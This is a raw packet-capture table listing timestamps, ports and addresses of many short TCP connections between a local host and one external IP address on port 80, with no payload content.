Feb 7, 2023 20:02:26.340658903 CET	50059	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:26.341775894 CET	50060	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:26.403785944 CET	80	50059	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:26.404006004 CET	50059	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:26.406008959 CET	80	50060	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:26.406199932 CET	50060	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:26.448813915 CET	50060	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:26.511230946 CET	80	50060	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:26.515285015 CET	80	50060	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:26.515528917 CET	50060	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:27.646684885 CET	50060	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:27.647769928 CET	50061	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:27.708091021 CET	80	50061	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:27.708333015 CET	50061	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:27.709081888 CET	80	50060	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:27.709178925 CET	50060	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:27.765974045 CET	50061	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:27.826277018 CET	80	50061	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:27.830638885 CET	80	50061	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:27.830859900 CET	50061	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:27.963113070 CET	50061	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:27.966206074 CET	50062	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:28.023358107 CET	80	50061	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:28.023572922 CET	50061	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:28.027036905 CET	80	50062	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:28.027271032 CET	50062	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:28.090657949 CET	50062	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:28.151420116 CET	80	50062	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:28.155061007 CET	80	50062	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:28.155318022 CET	50062	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:28.321257114 CET	50062	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:28.322308064 CET	50063	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:28.382205963 CET	80	50062	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:28.382424116 CET	50062	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:28.383866072 CET	80	50063	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:28.384057045 CET	50063	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:28.396717072 CET	50063	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:28.458342075 CET	80	50063	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:28.460707903 CET	80	50063	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:28.460892916 CET	50063	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:30.562225103 CET	50063	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:30.563299894 CET	50064	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:30.624449968 CET	80	50063	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:30.624627113 CET	50063	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:30.625957012 CET	80	50064	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:30.626157045 CET	50064	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:30.633739948 CET	50064	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:30.699162006 CET	80	50064	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:30.702920914 CET	80	50064	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:30.703129053 CET	50064	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:30.866869926 CET	50064	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:30.867904902 CET	50066	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:30.928050041 CET	80	50066	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:30.928307056 CET	50066	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:30.929387093 CET	80	50064	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:30.929483891 CET	50064	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:30.943301916 CET	50066	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.003230095 CET	80	50066	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.006328106 CET	80	50066	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.006530046 CET	50066	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.129306078 CET	50066	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.130044937 CET	50067	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.190140963 CET	80	50066	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.190355062 CET	50066	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.190592051 CET	80	50067	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.190769911 CET	50067	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.198972940 CET	50067	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.263186932 CET	80	50067	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.264014006 CET	80	50067	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.264123917 CET	50067	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.379312992 CET	50067	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.380337000 CET	50068	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.439749956 CET	80	50067	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.439918995 CET	50067	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.441618919 CET	80	50068	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.441833019 CET	50068	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.452025890 CET	50068	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.513511896 CET	80	50068	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.516680002 CET	80	50068	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.516825914 CET	50068	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.665919065 CET	50068	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.666872025 CET	50069	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.727471113 CET	80	50068	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.727596998 CET	50068	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.728121042 CET	80	50069	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.728400946 CET	50069	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.730232000 CET	50069	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.791558981 CET	80	50069	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.794500113 CET	80	50069	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.794682026 CET	50069	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.910105944 CET	50069	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.911206007 CET	50070	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.971451044 CET	80	50069	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.971652985 CET	50069	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.972697020 CET	80	50070	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:31.972866058 CET	50070	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:31.982507944 CET	50070	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.044183969 CET	80	50070	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.048238039 CET	80	50070	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.048413038 CET	50070	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.161524057 CET	50070	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.175312042 CET	50071	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.223228931 CET	80	50070	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.223476887 CET	50070	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.234772921 CET	80	50071	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.235024929 CET	50071	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.235512018 CET	50071	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.294858932 CET	80	50071	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.298506021 CET	80	50071	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.298723936 CET	50071	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.409181118 CET	50071	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.411472082 CET	50072	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.468859911 CET	80	50071	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.470575094 CET	50071	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.473032951 CET	80	50072	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.475322962 CET	50072	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.475919008 CET	50072	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.537333012 CET	80	50072	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.540923119 CET	80	50072	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.541186094 CET	50072	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.644891977 CET	50072	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.646042109 CET	50073	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.706507921 CET	80	50072	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.706940889 CET	50072	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.708451033 CET	80	50073	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.708693027 CET	50073	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.709343910 CET	50073	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.771754980 CET	80	50073	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.774380922 CET	80	50073	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.774530888 CET	50073	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.878391027 CET	50073	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.879451036 CET	50074	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.939965963 CET	80	50074	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.940113068 CET	50074	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.940709114 CET	50074	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:32.940853119 CET	80	50073	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:32.940934896 CET	50073	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.001205921 CET	80	50074	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.003427982 CET	80	50074	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.006333113 CET	50074	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.113069057 CET	50074	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.114269018 CET	50075	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.173623085 CET	80	50074	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.173996925 CET	50074	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.174490929 CET	80	50075	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.174731016 CET	50075	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.175281048 CET	50075	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.235548973 CET	80	50075	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.239239931 CET	80	50075	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.239322901 CET	50075	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.347923040 CET	50075	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.348867893 CET	50076	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.408483982 CET	80	50076	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.408533096 CET	80	50075	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.408735991 CET	50075	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.409322977 CET	50076	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.409322977 CET	50076	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.468972921 CET	80	50076	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.471015930 CET	80	50076	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.471221924 CET	50076	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.595933914 CET	50076	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.596898079 CET	50077	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.655538082 CET	80	50076	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.655760050 CET	50076	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.658246040 CET	80	50077	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.658432961 CET	50077	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.659591913 CET	50077	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.721965075 CET	80	50077	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.723758936 CET	80	50077	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.723952055 CET	50077	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.830847979 CET	50077	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.831764936 CET	50078	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.892252922 CET	80	50077	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.892520905 CET	50077	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.893196106 CET	80	50078	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.893326044 CET	50078	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.896003962 CET	50078	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:33.957618952 CET	80	50078	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.959949970 CET	80	50078	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:33.960171938 CET	50078	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.065834045 CET	50078	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.066771030 CET	50079	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.127110958 CET	80	50079	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.127358913 CET	50079	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.127445936 CET	80	50078	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.127572060 CET	50078	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.128936052 CET	50079	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.189053059 CET	80	50079	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.192717075 CET	80	50079	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.192917109 CET	50079	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.299905062 CET	50079	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.300743103 CET	50080	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.360001087 CET	80	50080	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.360147953 CET	80	50079	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.360228062 CET	50080	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.360285044 CET	50079	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.379327059 CET	50080	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.438780069 CET	80	50080	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.441154957 CET	80	50080	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.441241026 CET	50080	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.552740097 CET	50080	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.555649996 CET	50081	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.612497091 CET	80	50080	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.612624884 CET	50080	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.617331028 CET	80	50081	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.617450953 CET	50081	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.618170977 CET	50081	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.679615974 CET	80	50081	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.682039976 CET	80	50081	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.682229042 CET	50081	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.821974993 CET	50081	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.823657036 CET	50082	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.883536100 CET	80	50081	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.883763075 CET	50081	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.886080027 CET	80	50082	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.886306047 CET	50082	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.890335083 CET	50082	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:34.952814102 CET	80	50082	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.954993963 CET	80	50082	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:34.955111980 CET	50082	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.154233932 CET	50082	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.155399084 CET	50083	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.215922117 CET	80	50083	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.216092110 CET	50083	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.216896057 CET	80	50082	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.217006922 CET	50082	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.239474058 CET	50083	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.300054073 CET	80	50083	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.304311991 CET	80	50083	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.304445028 CET	50083	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.515594959 CET	50083	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.516527891 CET	50084	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.576196909 CET	80	50083	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.576415062 CET	50083	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.576803923 CET	80	50084	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.576968908 CET	50084	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.626446009 CET	50084	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.686999083 CET	80	50084	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.689728022 CET	80	50084	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.689935923 CET	50084	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.848799944 CET	50084	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.850037098 CET	50085	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.909404993 CET	80	50084	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.909594059 CET	50084	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.910376072 CET	80	50085	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.910578012 CET	50085	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.926261902 CET	50085	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:35.986778975 CET	80	50085	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.989306927 CET	80	50085	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:35.989480019 CET	50085	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.144766092 CET	50085	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.145940065 CET	50086	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.205194950 CET	80	50085	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.206193924 CET	80	50086	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.207777023 CET	50085	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.207844019 CET	50086	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.208343983 CET	50086	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.268666983 CET	80	50086	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.272155046 CET	80	50086	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.275718927 CET	50086	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.412262917 CET	50086	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.413502932 CET	50087	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.474173069 CET	80	50086	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.475861073 CET	50086	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.485213995 CET	80	50087	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.502990961 CET	50087	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.507623911 CET	50087	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.569988966 CET	80	50087	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.572530031 CET	80	50087	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.573268890 CET	50087	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.696805000 CET	50087	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.698134899 CET	50088	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.757417917 CET	80	50087	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.759512901 CET	50087	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.759767056 CET	80	50088	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.765455961 CET	50088	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.767848969 CET	50088	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.830018997 CET	80	50088	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.832468033 CET	80	50088	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:36.832720995 CET	50088	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.957272053 CET	50088	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:36.958200932 CET	50089	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.019131899 CET	80	50088	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.019709110 CET	80	50089	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.024202108 CET	50088	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.024247885 CET	50089	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.027587891 CET	50089	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.089298010 CET	80	50089	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.093354940 CET	80	50089	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.099396944 CET	50089	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.221478939 CET	50089	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.231877089 CET	50090	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.283245087 CET	80	50089	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.284689903 CET	50089	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.292455912 CET	80	50090	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.293072939 CET	50090	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.310664892 CET	50090	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.371123075 CET	80	50090	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.373964071 CET	80	50090	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.396524906 CET	50090	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.538847923 CET	50090	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.539623976 CET	50091	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.600199938 CET	80	50090	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.602022886 CET	80	50091	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.619316101 CET	50090	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.619452953 CET	50091	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.622394085 CET	50091	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.683784962 CET	80	50091	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.687155008 CET	80	50091	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.687803984 CET	50091	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.806087017 CET	50091	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.807329893 CET	50092	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.867160082 CET	80	50092	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.867443085 CET	50092	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.867609024 CET	80	50091	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.868052006 CET	50092	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.868233919 CET	50091	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:37.927721024 CET	80	50092	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.930119991 CET	80	50092	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:37.934596062 CET	50092	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.055876017 CET	50092	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.056878090 CET	50093	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.115734100 CET	80	50092	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.118283987 CET	80	50093	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.121624947 CET	50092	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.121716022 CET	50093	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.122438908 CET	50093	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.184302092 CET	80	50093	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.187990904 CET	80	50093	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.188189030 CET	50093	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.311281919 CET	50093	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.312117100 CET	50094	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.372981071 CET	80	50093	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.373106956 CET	50093	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.373534918 CET	80	50094	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.373856068 CET	50094	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.377723932 CET	50094	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:02:38.439266920 CET	80	50094	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.441557884 CET	80	50094	62.204.41.4	192.168.2.6
Feb 7, 2023 20:02:38.448317051 CET	50094	80	192.168.2.6	62.204.41.4
